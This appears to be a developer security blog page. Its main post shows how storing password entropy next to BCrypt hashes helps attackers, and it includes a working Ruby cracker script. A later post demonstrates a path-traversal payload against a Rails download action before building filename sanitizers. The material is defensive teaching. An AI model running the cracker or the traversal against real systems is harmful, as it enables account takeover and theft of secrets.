A Tale of Security Gone Wrong

ruby, security

I was approached recently by a friend (you can call him Jon) that had a security story to share with me. It was an interesting scenario that could have been dire for them had they:

  1. Not discovered the problem
  2. Been breached

Wanting to improve the security of their application, Jon’s team decided to implement a password entropy feature to encourage their users to use strong passwords. This is a useful feature that companies like Dropbox, Twitter, and eBay have implemented. Jon’s team decided to use the Zxcvbn library to implement their entropy generator. Again nothing wrong here.

Where things went off the rails is when Jon’s team decided to store the entropy in the database. The rationale was that as technology progressed and password cracking became easier, users could be contacted to update their password. The trouble is that this significantly weakens password hashing algorithms (Jon’s team was using BCrypt) and decreases the time it takes to attack/brute force hashed passwords.

Thankfully this story has a happy ending and Jon’s team discovered the issue during a security audit and yanked it immediately.

The rest of this post will examine how storing entropy completely destroys your hash-password security hurtrealbad

Using Zxcvbn to Calculate Entropy

Dropbox using Zxcvbn

Above you can see an image of Dropbox’s password meter. It’s a series of bars/colors to show relative password strength. The underlying calculations are done with the Zxcvbn library. And the code to use it is quite simple:

1
2
3
4
require 'zxcvbn'

result = Zxcvbn.test('@lfred2004')
puts result.entropy   # => 14.814

For Jon’s application, when a user entered in their password, the app would calculate and store the entropy value along with the BCrypt hashed password. Below is a simplified version of the Users table.

User table with Entropy stored beside BCrypt hashed passwords

If you don’t think about security on a regular basis, this probably looks normal. The next question to ask, is how can an adversary with the Users table exploit the entropy value and crack passwords?

Why Storing Entropy is a Terrible Idea!

You see entropy is information leaking. When it comes to passwords (and secure systems in general) you want to leak as little information as possible. Otherwise an attacker has information they can use to their advantage. To leverage this information you need to understand a few things about hashing speeds.

Table of hash algorithm timing

Above you can see, BCrypt takes a long time to do 10,000 password hashes compared to MD5/SHA1. BCrypt was designed to make brute forcing password hashes expensive whereas MD5 and SHA1 weren’t designed with that consideration. Which leads us to ask: how long does it take to calculate Zxcvbn values?

Table of Zxcvbn timing along with hash algorithm timing

You can see from the above image that Zxcvbn takes significantly less time to run 10,000 iterations than BCrypt – 124x faster. The implication then is that you can input passwords into Zxcvbn and generate a subset of candidate passwords which can then be hashed with BCrypt. The algorithm is going to look like this:

A visual diagram detailing the entropy cracking steps

  1. Get a list of common passwords (the bigger the better)
  2. Run the common passwords through Zxcvbn to get an entropy value
  3. Use entropy as a hash key, store the password as a value in an array
  4. Sort Users table by lowest to highest entropy
  5. Iterate the Users table and use the entropy column to index your hash
    • If a hash key is present:
      • The value array are candidate passwords
      • BCrypt the candidate passwords and compare to database hash

Writing a Cracker

Let’s write the algorithm described above. Starting with the first 3 steps:

1
2
3
4
5
6
7
8
9
10
11
12
13
require 'zxcvbn'

tester = Zxcvbn::Tester.new
entropies = {}

dictionary_pwds = open("common_passwords.txt").readlines

dictionary_pwds.map(&:chomp).each do |pwd|
  value = tester.test(pwd).entropy

  entropies[value] ||= []
  entropies[value] << pwd
end

The result of the above is a hash of arrays with the key being the entropy for the passwords in the value array:

1
2
3
4
5
6
7
8
{
  0.0    => [ 'password', 'james', 'smith', 'mary' ],
  11.784 => [ 'Turkey50', 'zigzag', 'bearcat' ],
  11.236 => [ 'samsung1', 'istheman' ],
  ...
  17.434 => [ '01012011', '01011980', ... '01011910' ],
  ...
}

The next part of the algorithm loads the database, sorts by lowest to highest entropy (easiest to hardest), and tries to crack the password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
require 'sqlite3'
require 'bcrypt'

# Open a SQLite 3 database file
db = SQLite3::Database.new 'entropy.sqlite3'

db.execute("SELECT * FROM users ORDER BY entropy") do |user|
  # Load user record
  email       = user[1]
  pwd_hash    = user[6]
  pwd_entropy = user[7]

  puts "User: #{email}, entropy: #{pwd_entropy}, password_hash: #{pwd_hash} "

  candidate_passwords = entropies[pwd_entropy]
  if candidate_passwords != nil
    passwords = candidate_passwords.select do |candidate|
      BCrypt::Password.new(pwd_hash) == candidate
    end.flatten

    # Should be 0 or 1 -- if > 1, something wrong
    if passwords.length == 0
      puts "No Matching Candidates"
    elsif passwords.length == 1
      puts "Password is: #{passwords.first}"
    end
  else
    puts "No Candidates Found"
  end
end

And that’s it. There’s nothing overly difficult in this algorithm. It’s basically 3 loops and a couple of hash functions, but what drops out is non-trivial. If this were a real database, you’d have email and password combinations flying at you. Which is a real problem that means you’re losing your user’s information!

As I mentioned, this was a good news story for Jon and his team when they discovered this issue without their database getting compromised and seeing their names in the news. However, that was not the case for Ashley Madison. That’s right! Ashley Madison made a similar error when they stored the MD5 hash of their user’s passwords in their database alongside the BCrypted hashes. This lead researchers to crack almost 1/3 of their 30 million password hashes!

While it’s nice to feel smug and laugh at Ashley Madison’s peril, there is a real possibility that you’ve done something equally stupid compromising in your own database. I’ve posted the code and an example database on github, take a look at the code and see if you can write your own cracker.

Security for JS Developers: A Presentation

other, presentations, security

On Feb 16th, 2016 I gave a presentation to yycjs on security for JS developers. The presentation covers:

The above link will take you to detailed explanations on the topic I’ve done previously — and I’ll work on getting a post developed for the timing attack.

As part of the presentation I used a neat tool called sqlmap which you can read more about. And I also referenced BCrypt multiple times. There are good reads on BCrypt and hashing passwords in 2016.

Creating a Safe Filename Sanitization Function

brakeman, ruby, security

In a previous post on File Access Vulnerabilities I mentioned the use of a sanitize function. Sanitize functions are needed because you don’t always have full control of file names or file paths provided by a user. And when you can’t control file names/paths the attack surface of your application increase.

This post will work through the creation of a file sanitization function, contrast whitelisting vs blacklisting, and look at a gem to handle sanitization.

Let’s start with an example of code that would need a sanitize function:

1
2
3
4
5
6
7
8
def download
  language_code = params[:code]
  send_file(
    "#{Rails.root}/config/locales/#{language_code}.yml",
    filename: "#{language_code}.yml",
    type: "application/yml"
  )
end

This is from a question asked on StackOverflow. The questioner stated that param[:code] was dynamic and couldn’t be determined a priori. They were correct in assessing that this is vulnerable to an attacker submitting an HTTP request with the parameter of: code=../../../config/database. Bam! Compromised database.yml file.

This means that the above function needs to be sanitized so that the system doesn’t get compromised.

Whitelisting vs Blacklisting

There are two main methods you can use to sanitize user input: whitelisting or blacklisting.

  • Whitelisting is the act of setting what characters are allowed.
  • Blacklisting is setting what characters are not allowed.

The distinction is subtle but makes a huge different for security and usability of a function.

Generally speaking you want to use a whiltelisting function before a blacklisting function. This is because whitelists (if done properly) are safer – you’re stating what is allowed vs trying to exclude all the bad things that shouldn’t be allowed. In such a case you’ll typically miss something and viola an attacker has an in. You’re smart, but when someone is motivated they’ll figure out a way to be smarter then you!

This particular instance is nice since the download is restricted to .yml files, meaning you can be extra aggressive in your whitelisting. Let’s write a naive whitelist function:

1
2
3
4
def sanitize(filename)
  # Remove any character that aren't 0-9, A-Z, or a-z
  filename.gsub(/[^0-9A-Z]/i, '_')
end

In the above case, if you used the malicious string ../../../config/database the output is just what you’d want: _________config_database. The slashes and dots are all removed and your database.yml is safe. You could have skipped replacing the ‘bad’ characters with an underscore _, but I prefer underscores since it’s more friendly/readable for the normal, non-attacker use case.

But! (there’s always a but) You’ve got some additional considerations. While the above function is safe, it is limited to a minimal character set. What happens if you inserted any of these characters: é 猪 pig into that function? They get stripped out!

In this case, you’re probably ok with that given the context of the files. You likely have full control of the language files so you can make assertions in your sanitization. But that’s not always the case.

This is where whitelists can become unwieldly. As a programmer you don’t want to go and define every single character that you want to allow; that’s tedious. That’s where the blacklist function comes in. Let’s see that:

1
2
3
4
5
6
7
8
9
def sanitize(filename)
  # Bad as defined by wikipedia: https://en.wikipedia.org/wiki/Filename#Reserved_characters_and_words
  # Also have to escape the backslash
  bad_chars = [ '/', '\\', '?', '%', '*', ':', '|', '"', '<', '>', '.', ' ' ]
  bad_chars.each do |bad_char|
    filename.gsub!(bad_char, '_')
  end
  filename
end

Using the function, with some weird input: 猪<lǝgit> "input" °?I |s:*w*:é::ä::r: /\.?%ʎן octopus you get the following back (results may vary by OS): 猪_lǝgit___input_°__I__s__w__é__ä__r______ʎן octopus . And while this isn’t the prettiest filename, it’s what the user wanted!

This code is more complex than the whitelisting sanitize, and it’s more permissive. It’s also more user friendly since it’s giving the user what they put in.

Alternatives

The last piece to mention is alternatives. If you’re looking for a good gem that does this for you I’d recommend Zaru. It handles the same “bad characters” as the blacklist sanitize above, and also handles some windows edge cases for reserved words. Plus it’s got a test suite, which is a comfort when you’re looking at filename sanitization!

Security for Ruby Developers: A Presentation

presentations, rails, ruby, security

On Jan 5th, 2016 I gave a presentation to YYCRuby on security for Ruby developers. The presentation covers:

If you weren’t present, the slides probably won’t make a whole lot of sense. The above links will take you to detailed explanations of the topics I’ve done previously.

I mentioned in the presentation some fantastic external tools that you can use to secure your app. They are: